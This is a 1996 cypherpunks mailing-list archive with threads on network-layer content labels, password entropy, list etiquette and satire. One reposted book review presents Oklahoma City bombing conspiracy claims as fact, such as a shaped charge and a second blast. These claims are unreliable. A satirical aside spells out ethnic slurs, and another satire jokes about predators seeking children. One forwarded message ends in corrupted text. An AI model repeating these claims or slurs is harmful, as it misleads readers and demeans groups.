Message-ID: <Pine.3.89.9604171551.A25609-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain




And don't forget, if you haven't already - to read Rappoport's interview 
with an ex-juror from the OKC Bombing case, on my website (url below.)

			Lisa Pease
====================================================================

	 	    One person, one vote. 
		 Not one dollar, one vote. 
	End private government. Ban corporate donations.

Check out the Real History Archives  http://www.webcom.com/lpease
Read Contemporary Real History at http://www.webcom.com/ctka


On Wed, 17 Apr 1996 ssalgaller@CCGATE.HAC.COM wrote:

>      Suggested Reading:
>      
>      Oklahoma City - The Suppressed Truth 
>      By Jon Rappoport
>      Blue Ocean Press
>      2633 Lincoln Blvd., Suite #256
>      Santa Monica, CA 90405
>      (213) 243-9005
>      copyright 1995
>      $12 (post paid)
>      
>      At 9:02 AM on April 19, 1995, the Murrah Federal Building in Oklahoma 
>      City
>      was damaged in an explosion that also left 168 dead and 600 injured. 
>      If you
>      look closer at this case, as investigative reporter Jon Rappoport has, 
>      you
>      start asking some questions about the "official' story:
>      
>      The damage was supposedly caused when thousands of pounds of a fuel 
>      oil and
>      fertilizer mixture was ignited in a truck parked near the building. 
>      Talk
>      about "oil and water never mixing". This mixture would have to be 
>      either
>      stirred or mixed just before use. It would also have to be detonated 
>      without
>      any air spaces, such as the gaps between the fuel drums, in order to 
>      work.
>      
>      Even if the mixture detonated, it should leave traces of oil. none was 
>      found.
>      
>      Even if it detonated perfectly, the explosion was 3 times too weak to 
>      damage
>      the building's reinforced concrete support columns.
>      
>      Especially column "B3". This column was sheared off at the 3rd floor 
>      level.
>      Only a shaped charge placed directly on the column at that level would 
>      be
>      able to cause this to happen. That section of the column was cut out 
>      and
>      removed as evidence. Will we ever see it again at the trial ?
>      
>      Local seismometers noted *two* explosions, 10 seconds apart. This was 
>      "explained away" as reflections of the explosion by underlying rock 
>      strata.
>      Ask a geologist if this sort of time delay has ever been observed 
>      before you
>      decide if someone is "underlying".
>      
>      What ever happened to "John Doe #2", seen with Tim Mc Veigh that 
>      morning ?
>      
>      What happened to John Doe's #3 and #4, seen leaving the area soon 
>      after the
>      explosion?
>      
>      Speaking of Tim, why (if the official story is true) did he advise the 
>      officer who stopped him that he had a concealed weapon ? Supposedly, 
>      he just
>      killed 168 people, including 19 children. What's one more if it means 
>      he
>      could get away ?
>      
>      And what about Terry Nichols ?
>      He was advocating killing Federal employees at a public meeting in 
>      Estes, CO
>      a year before the bombing. The FBI is very efficient, yet no one seems 
>      to
>      have paid any attention to Terry to prevent loss of life.
>      
>      What about the reported financial links to the bombing, not from right 
>      wing
>      causes, but from the Brittish Government ?
>      
>      Finally, what happens if and when the truth comes out in open court at 
>      Tim
>      and Terry's trial ? One could guess that the real suppressed story 
>      will be
>      one more casualty of the bombing.
>      
>      Unless we demand that someone explains column "B3".
>      
>      It *can* happen here - and it *did* a year ago !
>      
>      Book "review" by
>      Stephen S.
>      salgaller@aol.com
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 18 Apr 1996 09:54:59 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <199604171526.LAA30813@jafar.sware.com>
Message-ID: <199604172021.QAA01638@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Barber writes:
>Scott Brickner writes:
>> Steve Reid writes:
>> >Really, the apropriate place for content filtering is at the application 
>> >layer. It *could* be done at the transport layer, but that's really not 
>> >the place for it.
>> 
>> Izzat so?  So explain to me what the difference between the PICS type
>> ratings and security classifications is.
>
>> Clearly the IETF believed that the network layer was an appropriate
>> place for general classification when they developed IPv4.  I haven't
>> verified it, but I suspect that IPv6 has (or will have) an appropriate
>> mechanism for indicating security classification.
>
>That's not at all clear.  The IETF did not sit down in committee and
>"develop IPv4" (thank god).  And I've not seen any evidence that it was
>designed with support for security labels in mind.

Nevertheless, security labels *already* exist in IPv4.

>Personally, I agree with Steve that, even though IP *may* be used to
>propagate security options, it isn't the "right" place.
>
>One problem with labeling things at the transport level is that this

Actually, we're talking about the network level.  The transport level
is where TCP and UDP reside, not IP, which has the security labels.

>requires support for the labels throughout the operating system(s) on
>which the "content" is generated (at least for a "real" multi-user system
>with a potentially mixed adult/child user base) or through which it flows.
>The operating system has to carry labels around in conjunction with each
>and every process and file on the system in order that the low-level
>software will be able to accurately label IP datagrams.  And this OS
>support is both difficult to implement and onerous to the users and
>applications running on that platform -- otherwise, we'd all be running
>on TCSEC B-level operating systems right now.

I'm beginning to agree with the CDA supporter who claimed that "you're
just trying to protect your pornography by saying it's impossible when
we all know otherwise."  Of course, that person really didn't know
otherwise, but I do.  The abstract model of the Internet network layer
thinks of all transport entities as equivalent, as are all link
entities.  In the real world, such mixed user bases are unusual.  If my
scheme were implemented, service providers would probably have to
segregate shell account access onto "childproof" and "adult" machines,
or acquire a TCSEC B level system.  Either approach works, and most
would likely choose the former, since its cheaper.  It's still not
really that many machines.

>Fundamentally, the decision boils down to whether you want the labeling
>to be mandatory (as with DoD security labels) or voluntary as with PICS.

I don't want the labelling to exist at all.  But I note that even PICS
labelling is not strictly voluntary.  A content provider who fails to
label adult material as "unsuitable for minors" is fully liable for
legal penalties should such material be transmitted to a minor.  The CDA
has nothing to do with it.  It's the same situation as when a bookstore
sells Playboy to a minor or a liquor store sells him beer.

As I outlined the scheme, network layer labels are just as "voluntary".
They really are in the DoD security world, too.  If you create a file in
an editor, you're responsible for making sure the right classification
goes on it, and *you're* going to be held accountable if the information
is leaked because you put the wrong label on it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 18 Apr 1996 15:43:20 +0800
To: ssalgaller@CCGATE.HAC.COM
Subject: ILF, SAC chapter [was Yadda Yadda Re: Oklahoma City- One Year Later]
In-Reply-To: <9603178297.AA829776269@CCGATE.HAC.COM>
Message-ID: <Pine.ULT.3.92.960417154149.2026E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 17 Apr 1996 ssalgaller@CCGATE.HAC.COM spammed:

>      Suggested Reading:
[...]
>      copyright 1995
>      $12 (post paid)

Wrong. Information longs to be FREE.

You don't need to pay money for right-wing paranoid rants anymore. You can
now get this title, and many other random wacko publications, for postal
and duplication costs only from the copyright terrorists of the Sub-Aryan
Corps, in loose cooperation with Not_By_Me_Not_My_Views Publishing. I
believe the referenced piece goes for $2.25. Send cleartext inquiries and
offers to The Hare <hare@alias.alias.net>. Please note that Hare cannot
accept messages larger than 32K.

For a partial listing of materials available from the SAC/NP, send $2 to
National Vanguard Books, PO Box 330, Hillsboro WV 24946. All materials in
the National Vanguard Catalog are immediately available from SAC/NP for
75% off the price quoted by National Vanguard Books. SAC/CP charges no
sales tax.

Discussion of possibly illegal activities should be sent PGP-encrypted to
Presidente Dante <alighieri@alpha.c2.org> ONLY. Dante's public key is
available on all the keyservers.

Coming attractions from the Sub-Aryan Corps:

* Audiocassettes from the latest private meetings of the Michigan Militia,
  National Alliance, and Knights of the KKK.
* Communication between Neo-Nazi leader Willis Carto and various front
  groups, such as the Institute for Historical Review and the Liberty
  Lobby.
* Detailed financial disclosure statements from Ernst Zundel, Willis
  Carto, William Pierce, Ingrid Rimland, the White Aryan Resistance,
  Milton Kleim, Don Black, "Reverend" Schoedel, and Samisdat Publishing.

- -rich
 no longer a member of the SAC, but a big fan

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMXV9b43DXUbM57SdAQGZngQAskHU7Gvv1F66i4rGPK4xEXyhN33pa5Ns
meVUeZqdViWv+gIIj1sgHX6KLj9h7pZ+YAI/+vNrrMZ2aZkyJniwDWYhLJCODlxM
Jy9I38XYq+CbMaraliNvkuanzYjbNG7vbuKSCnetTAlQySBILdtOvxceBBUA6soX
JTtt/VwxBWc=
=W89G
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@gti.net>
Date: Thu, 18 Apr 1996 10:35:28 +0800
To: hoz@univel.telescan.com (rick hoselton)
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <199604171558.IAA02972@toad.com>
Message-ID: <199604172037.QAA17212@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be rick hoselton wrote:
: 
: Another example: What if I selected a nonsense passphrase, 
: "Dagmar shaved Howard's cocker spaniel"  Not great, but adequate for my needs.
: If, by some wild coindence, a book by that title became a best seller, I would 
: change my passphrase.  A cryptanalyst who knew that was my feeling could
: simplify 
: his cracking by not bothering to search for best selling book titles.  On
: the other 
: hand, a cryptanalyst who was not so convinced of my paranoia, and who DID check 
: book titles, would not find my passphrase.  I assume that BOTH philosophies 
: would be used in a serious attack.  When I do the math, it says that, assuming 
: BOTH types of attack are done, it is better to have a passphrase that is not 
: the title of a book. 

By the same token, if an admin runs crack on /etc/passwd to weed out poor
passwords isn't going to be faulted for reducing the key space for user's
passwords. The question is, how much of the keyspace should be eliminated
as "obviously a poor choice"?

Also, how much of this falls under "security through obscurity"?  If an
attacker knows what you omit .. his/her job is a bit easier.

Is it possible to find a percentage of the key space to eliminate that
will optimize security assuming that the attacker will try the easy
stuff first (and is it possible to quantify "easy stuff")?

- -- 
  Mark Rogaski    | Why read when you can just sit and |      Member
  System Admin    |         stare at things?           | Programmers Local
  GTI GlobalNet   | Any expressed opinions are my own  |     # 0xfffe
wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMXVWfQ0HmAyu61cJAQHltwP8Coe0i13a7NtFRYlCBdt1AEVEbz9jQhLp
6WPqGc80ETo8knHZAPVFP6ae1MmHYfbWhOY0y7I/Cv4kN8Smmu6mwIeYsuPRjCl9
ODK6qDUX1CcQX74t4ZvkTL2Umsnvwchvl1wHnaINGtud9C6nVREf34880vmJsYrl
5vsRJ1wo5Ng=
=zY9A
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@isdn.net>
Date: Thu, 18 Apr 1996 10:43:40 +0800
To: cypherpunks@toad.com
Subject: Fw: CWD-Pool Cool
Message-ID: <199604172138.QAA22793@rex.isdn.net>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Thought some of you might enjoy this.  I sure some of you have already 
read it, and if so, sorry for the excess noise.

- -----Begin Included Message ----- 

Date: Wed, 17 Apr 1996 05:34:40 -0700
 From: "Brock N. Meeks" <brock@well.com>
To: cwd-l@cyberwerks.com
Cc: 


CyberWire Dispatch // Copyright (c) 1996 //

Note:  This is a re-issue of Dispatch.  An earlier attempt to send to 
the
CWD list was tanked by a glitch in the software.   You may have seen 
this
as reposted from another Newsgroup.   If so, disregard and accept our
apologies for the redundency;  however, lots of CWD list subscribers 
have
asked for this reposting and we are 
compl=07=01=D46=82
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMXVkqRKvccEAmlQ9AQHihwf7BItG4dpM564IQAUtbaQzFfjkJcfLvnrn
4OVJ98LgWEKa1mjqU728hp4g32lBfjYqcHC1Teh1vs4KTWSSM+Oz9fHA6NUNrgdX
MgZkNqSqOx7J+QRfssIb9GgBoh/WA51cjU3r6LZcI4vviuTBx/+tBXkvmpDs3txS
DJYKejwwKorOc3rq0Ro3BrSRDcC2aQdgkyetOwDA26uSC0tqp0OX2FLGi7XTmmqX
mdE5gIs+OflImRBV23L+bTGy47C5qOQ5MaqYiSw5ka7360O1g5PHXZ/yCguyHCwd
Dnx2hr4L7PbHi91Dg0EdYHUhyhRH9CFAm9xJ4Few5znrqI6kCqKAiw==
=AcaM
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 18 Apr 1996 10:00:48 +0800
To: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Subject: Re: Re[2]: "STOP SENDING ME THIS SHIT"
In-Reply-To: <9603178297.AA829764813@ccmail.wnyric.org>
Message-ID: <199604172053.QAA05596@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Adam Pingitore" writes:
>           I've got news for you all. This 'jerk' was spammed by some
>           ass out there. I've canceled by subscription so would you
>           all quit whining already. Sorry if I sent you people
>           inappropriate mail, but I just wasn't very happy getting
>           2000 e-mails a day.

Remedial english composition courses are available at virtually all
community colleges, and are a great help in making yourself understood
in writing.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Thu, 18 Apr 1996 11:23:10 +0800
To: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Subject: Re: Re[2]: on corporations and subpoenas
Message-ID: <199604172214.RAA14200@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger wrote...
 
> "Adam Pingitore" writes:
> >           Um, well, then I'm going to have to spam your ass.
> 
> Not a finger raised. I will do nothing whatsoever to take you off this
> mailing list.
> 
> Have fun.
> 

Oooh, oooh, can I have some Spam (TM) too?

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 18 Apr 1996 15:42:45 +0800
To: perry@piermont.com
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <199604162134.RAA15579@jekyll.piermont.com>
Message-ID: <199604172256.SAA09641@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:
>> In the context of "fair coin flips" the text of Hamlet is NOT compressible.
>
>Huh?
>
>There is only one context in which things are compressable or not --
>is there a smaller representation for them.

Then I propose the following compression algorithm to compress your
"random" one-time pad of 2 million bits with value k.  The algorithm
will decompress the input bit "1" to k, and decompress the input bit
"0" to the bit-string "10101010".  Therefore your "random" pad is
compressible to exactly one bit, and is not "random" as you supposed.

"Smaller representation" indeed.  The decompression *algorithm* must be
accounted for in the "representation" of the compressed text, otherwise
an arbitrary amount of information may be stored in the algorithm
itself.

Hamming codes offer a way to compress any bit stream.  They move
whatever patterns they can find in independent 8-bit segments into the
coding alphabet, and replace them with shorter strings.  If you don't
save the alphabet, you can't decompress the stream, and have lost
information that was originally in the stream.

If an OTP generator accidentally chooses "Hamlet", big deal.  As long
as your opponent believes that you have a good OTP generator he has no
reason to try "Hamlet" before any other pad, so Hamlet's
compressibility as english text is irrelevant.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leslie Farnsworth <leslie@koalas.com>
Date: Thu, 18 Apr 1996 14:15:27 +0800
To: Peter Trei <trei@process.com>
Subject: Re: What's the "Human Interaction Institute" at CMU For ???
In-Reply-To: <199604171319.GAA01301@toad.com>
Message-ID: <Pine.LNX.3.91.960417180722.3310D-100000@koalas.com>
MIME-Version: 1.0
Content-Type: text/plain


please take me off your emailing list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leslie Farnsworth <leslie@koalas.com>
Date: Thu, 18 Apr 1996 14:04:06 +0800
To: Bruce Marshall <brucem@wichita.fn.net>
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
In-Reply-To: <Pine.BSI.3.91.960417083229.17657A-100000@wichita.fn.net>
Message-ID: <Pine.LNX.3.91.960417180811.3310E-100000@koalas.com>
MIME-Version: 1.0
Content-Type: text/plain


take me of your emailing list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@crawfish.suba.com>
Date: Thu, 18 Apr 1996 11:41:35 +0800
To: cypherpunks@toad.com
Subject: java crypto packages
Message-ID: <199604172310.SAA00571@crawfish.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


The last time I looked, the coderpunks were talking about java crypto
packages.  Can anyone on that list tell me if any code has been made 
available?  Unfortunately the archive is dead...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: K00l Secrets <secret@secret.alias.net>
Date: Thu, 18 Apr 1996 15:32:55 +0800
To: cypherpunks@toad.com
Subject: CDA Court Challenges
Message-ID: <199604172315.SAA12354@paulsdesk.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


Are Declan's CDA reports numbers 1 and 2 available anywhere?  I seemed
to have missed them on the mailing list, and the web site also starts
at 3.  Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Apr 1996 13:38:16 +0800
To: cypherpunks@toad.com
Subject: LolitaWatch
Message-ID: <ad9ae3ef05021004ae11@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Sunnyvale, CA. Nubility, Inc. is pleased to announce the availability of
"LolitaWatch," a filter program for the Web and Net which alerts users
about the presence of nubile, young teens (and even younger!). LolitaWatch
operates by checking the federally-mandated "age bit."

No longer will you be frustrated in trying to contact that 12-year-old
girl, only to eventually learn she's a 44-year-old male playing mind games.
The President of Nubility, Pete Ofeil, said "Hey, the government says that
they have to wear a sign announcing their age...all we're doing is offering
a service to our customers."

(There is still the problem that the girl may be a boy, or vice versa,
depending on your preferences, but this is likely to be solved as the
"Fairness to Women and Other People of Color Protection Act," which
mandates that a "gender bit" be set.)

"LolitaWatch allows me to cut quickly to the chase, screening out the
hags," says Roy G. Biv, appreciator of young girls. "I've even rigged up my
copy of LolitaWatch to automatically alert me when one of these nubile
young things enters an IRC chat room!," he added with a sly grin.

LolitaWatch is available immediately for Windows and Macintosh. No Unix
version is planned because Unix users are, well, unix.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Thu, 18 Apr 1996 16:20:09 +0800
To: leslie@koalas.com
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <Pine.LNX.3.91.960417182818.3310o-100000@koalas.com>
Message-ID: <+iadx8m9LMsQ085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 17 Apr 1996 18:28:27 -0700 (PDT), Leslie Farnsworth <leslie@koalas.com> wrote:

> take me off your mailing list
> 

Okay . . . 

<clickclickclicketyclicketyclick>

There, that did it!

You are now deleted from every mailing list over which I have control.

Hope this helps.

-- 
Alan Bostick               | They say in online country there is no middle way
mailto:abostick@netcom.com | You'll either be a Usenet man or a thug for the CDA
news:alt.grelb             |    Simon Spero (after Tom Glazer)
http://www.alumni.caltech.edu/~abostick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Thu, 18 Apr 1996 14:25:08 +0800
To: sameer@c2.org
Subject: Re: "STOP SENDING ME THIS SHIT"
In-Reply-To: <199604171641.JAA26692@atropos.c2.org>
Message-ID: <199604180232.TAA17738@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: sameer@c2.org]
[cc: cypherpunks@toad.com]
[Subject: Re: "STOP SENDING ME THIS SHIT" ]
[In-reply-to: Your message of Wed, 17 Apr 96 09:41:05 MST.]
             <199604171641.JAA26692@atropos.c2.org> 

Sameer helpfully wrote:
>TCM:
>> I think the "clueless" mailing list is a must at this point.

>	clueless@c2.org/majordomo@c2.org
>	subscribe idiots as necessary.

Well, I suggested it, but in any case I'm glad to see that it has been
created! Thanks to Sameer for yet another innovative network service...

I'll watch it occasionally and post summaries?

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMXWfUYHskC9sh/+lAQFClQQAq3L3D0nIlK0QN3Dqy1KhmbzQrSpChWRM
GJg0hoDRBshn/FYYQqGzuddZfeNGfqqzpW5xqxhvl4VXl1nKopvrsMncr3EoYez8
Lwe8jhFz8M/opBssDhA6Nzq/z4E9HjqGICUqUvk5VnkNVDesGkW6pMzLyO9JUDlZ
owPxntrJ/sc=
=6vEv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Thu, 18 Apr 1996 15:09:16 +0800
To: "Pete O'Feale" <tcmay@got.net>
Subject: LolitaWatch v1.1
Message-ID: <v03006607ad9b5e4aabab@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


[ Newt Gingrich and his ilk being the mensches they are, I expect v2.0 may  ]
[ add support for the "Jew," "Nigger," "Kike," "Fag," "Nerd" and "Wop" bits ]
[  -dave                                                                    ]


Date: Wed, 17 Apr 1996 18:55:42 -0700
To: cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: LolitaWatch

Sunnyvale, CA. Nubility, Inc. is pleased to announce the availability of
"LolitaWatch," a filter program for the Web and Net which alerts users
about the presence of nubile, young teens (and even younger!). LolitaWatch
operates by checking the federally-mandated "age bit."

No longer will you be frustrated in trying to contact that 12-year-old
girl, only to eventually learn she's a 44-year-old male playing mind games.
The President of Nubility, Pete Ofeil, said "Hey, the government says that
they have to wear a sign announcing their age...all we're doing is offering
a service to our customers."

(There is still the problem that the girl may be a boy, or vice versa,
depending on your preferences, but this is likely to be solved as the
"Fairness to Women and Other People of Color Protection Act," which
mandates that a "gender bit" be set.)

"LolitaWatch allows me to cut quickly to the chase, screening out the
hags," says Roy G. Biv, appreciator of young girls. "I've even rigged up my
copy of LolitaWatch to automatically alert me when one of these nubile
young things enters an IRC chat room!," he added with a sly grin.

LolitaWatch is available immediately for Windows and Macintosh. No Unix
version is planned because Unix users are, well, unix.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 18 Apr 1996 17:02:09 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <199604172037.QAA17212@apollo.gti.net>
Message-ID: <Pine.SOL.3.91.960417173232.3025G-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 17 Apr 1996, Mark Rogaski wrote:

> 
> Is it possible to find a percentage of the key space to eliminate that
> will optimize security assuming that the attacker will try the easy
> stuff first (and is it possible to quantify "easy stuff")?

Hmmm- I think this could be interesting to study; if we treat the space 
of possible passwords as a non-uniform probability distribution 
(Zipfian?), and then transform it in such a way to be uniform (by 
having the probability of certain passwords being disqualified be 
based on their relative probability it should be possible to get a 
situation where all passwords are possible, and all have equal probability.
This gives optimum security ( I think). Of course there's then the game 
theory assumption that the attacker will know about this and try paswords 
randomly; if they instead attack passwords with a non-random approach, 
the optimum passwords will be tuned to their attack strategy, unless they 
know you're tuning to their attack in which case they will tune their 
attack to your [stack overflow - bus error, core dumped]

 Interesting exercise.


>   Mark Rogaski    | Why read when you can just sit and |      Member
>   System Admin    |         stare at things?           | Programmers Local
>   GTI GlobalNet   | Any expressed opinions are my own  |     # 0xfffe
> wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO

"There is power in a packet, power in a LAN
Power in the hands of the hacker,
But it all amounts to nothing if together we don't stand
There is power in a UNIX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 18 Apr 1996 13:26:43 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Toast Fishing in America
Message-ID: <2.2.32.19960417111001.0068736c@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:30 PM 04/17/96 -0700, Dave Del Toasto <ddt@lsd.com> wrote:
>[from "If _____ Made Toasters" ...my edits]
>
>    If The Rand Corporation made toasters...
>      They would be large, perfectly smooth, seamless black cubes.
>      Each morning, exactly as much toast as you could eat would
>      appear on top of your toaster. Their service department would
>      have an unlisted phone number and the cube's blueprints would
>      be highly-classified government documents, but the "X-Files"
>      would have an episode with a partially disassembled toaster
>      remarkably similar to it visible in the background.
>
>    If the NSA made toasters...
>      Your toaster would have a secret crumb-door on the back that
>      only the NSA could open in case they needed to inspect your
>      toast for breakfasts of a national security nature.
>

        If RSA made toasters...
           They'd tell you the price *only* after finding out how much toast
you wanted to make and how badly you wanted the toast; then they'd insist on
you making a piece of toast for them every time you used the toaster.

        If cypherpunks made toasters...
           Jim B and Black Unicorn would argue about whether toast should be
buttered, and what the appropriate flavor of jam/jelly should be; TC May
would point out that it wasn't really toast, but rather, sliced and
slightly-burned bread; Perry would kvetch about the lack of crypto-relevance
of toasters; and a few others would form a new listserver for toasterpunks.
The service department would be flooded with calls from newbies, asking how
to make toast.

        If Netscape made toasters...
           They'd beta-test the toasters for months, then make one slot too
wide and the other too narrow. It wouldn't be until a cook in a diner
pointed out that the toast wasn't coming out right that they'd have their
design reviewed by a 3rd-party Toaster Engineer.

        If Microsoft made toasters...
           They'd put the slots on the side, the actuator on top, make the
cord too short, and design it to only run properly on 177V, 41Hz. Then
they'd declare the toaster to be the new industry standard.

Dave Merriman
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Thu, 18 Apr 1996 14:07:23 +0800
To: unicorn@schloss.li
Subject: Re: "STOP SENDING ME THIS SHIT"
In-Reply-To: <Pine.SUN.3.91.960417042451.14115A-100000@polaris.mindport.net>
Message-ID: <9604180127.AA1750@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Uni" == Black Unicorn <unicorn@schloss.li> writes:

  > I think the "clueless" mailing list is a must at this point.

Here you go (*all* the instructions you need)---

----------------------------------------------------------------------

Return-Path: <listserv-manager@ucsd.edu>
Date: Wed, 17 Apr 1996 18:21:28 -0700
From: Listserv@ucsd.edu (Mailing List Processor)
To: foo@coelacanth.com
Subject: Re: your LISTSERV request "subscribe clueless"
X-Loop: Listserv@UCSD.EDU

Welcome to the Clueless Users Network Test System, an intelligence test
for the ignorant and impolite.

You have been automatically added to this mailing list because you sent a
subscription request like "UNSUB ME" out to the entire readership of a
mailing list, instead of sending it to the list server or list
maintainer.

There is nobody of worth reading this mailing list.  The only way you
can
become unsubscribed is to figure out the standard way of unsubscribing
from an Internet mailing list.  Until that time, you will get these
messages regularly.

If you made an innocent mistake in sending your "UNSUB ME" out to the
entire list, then you will know how to unsubscribe from this list
immediately and no harm will be done.

If, on the other hand, you simply have no clue how to deal with mailing
lists, you'd better start reading up on the subject before you go
blundering around again.  Your attention is cordially drawn to the
newsgroups news.announce.newusers, news.newusers.questions, and
news.answers.

Final hint: the mailing list address is clueless@ucsd.edu

Have fun.

----------------------------------------------------------------------

Return-Path: <listserv-manager@ucsd.edu>
Date: Wed, 17 Apr 1996 18:21:21 -0700
From: Listserv@ucsd.edu (Mailing List Processor)
To: foo@coelacanth.com
Subject: Re: your LISTSERV request "subscribe clueless"
X-Loop: Listserv@UCSD.EDU

Per your request
	"subscribe clueless"
'foo@coelacanth.com' was ADDED to the 'clueless' mailing list.

To remove yourself from this list, send the command
	'unsub foo@coelacanth.com clueless'
to clueless-request@ucsd.edu or listserv@ucsd.edu.
Listserv problems requiring human intervention
should be addressed to clueless-relay@ucsd.edu.

----------------------------------------------------------------------

Return-Path: <listserv-manager@ucsd.edu>
Date: Wed, 17 Apr 1996 18:21:00 -0700
From: Listserv@ucsd.edu (Mailing List Processor)
To: foo@coelacanth.com
Subject: Re: your LISTSERV request "subscribe clueless foo bar"
X-Loop: Listserv@UCSD.EDU

You may subscribe or unsubscribe to any of the various campus mailing
lists and the local redistributions of global mailing lists by sending
email to "listserv@ucsd".  The commands understood by the listserver
program are:

HELP
	lists this file.  This is also sent whenever a message to
	listserv is received from which no valid command could be
	parsed.

HELP listname
	lists a brief description of the maillist requested.

INDEX
	lists all the maillists available for subscription.

LONGINDEX
	lists all the maillists and their descriptions.

ADD listname	 
DELETE listname	

ADD address listname	 
DELETE address listname	
	adds or deletes the given address to or from the list
	specified.  Mail is sent to the address given to confirm the
	add or delete operation.  For on-campus users, we strongly
	recommend that you use your campus registered mailname when
	subscribing (i.e., use the second form of the command which
	includes a specification of the address).  If you omit the
	'address', the command will assume the mailbox that is in the
	From:  line of the message.  Note that SUBSCRIBE is a synonym
	for ADD; UNSUBSCRIBE for DELETE.

DELETE-ALL
UNSUBSCRIBE-ALL

DELETE-ALL address
UNSUBSCRIBE-ALL address
	unsubscribes given address from all mailing lists. Mail is sent 
	the address given to confirm the deletions. If you omit 
	the 'address' the command will assume the mailbox that is in 
	the From: line of the message.

LIST
LIST address
	lists all mailing lists to which the given address is subscribed.
	If you omit the 'address' the command will assume the mailbox is
	in the from line. 

FAQ
FAQ listname
	sends a list of "Frequently Asked Questions" for the appropriate
	mailing list. The command "FAQ" by itself sends an index of 
	available FAQ's.

A command must be the first word on each line in the message.  Lines
which do not start with a command word are ignored.  If no commands were
found in the entire message, this help file will be returned to the
user.  A single message may contain multiple commands; a separate
response will be sent for each.

Please note that it IS possible to add or delete someone else's
subscription to a mailing list.  This facility is provided so that
subscribers may alter their own subscriptions from a new or different
computer account.  There is therefore some potential for abuse; we
have chosen to limit this by mailing a confirmation notification
of any addition or deletion to the address added or deleted including
a copy of the message which requested the operation.  At least you
can find out who's doing it to you.

Examples:

	add sunusers

	add ewombat foodlovers

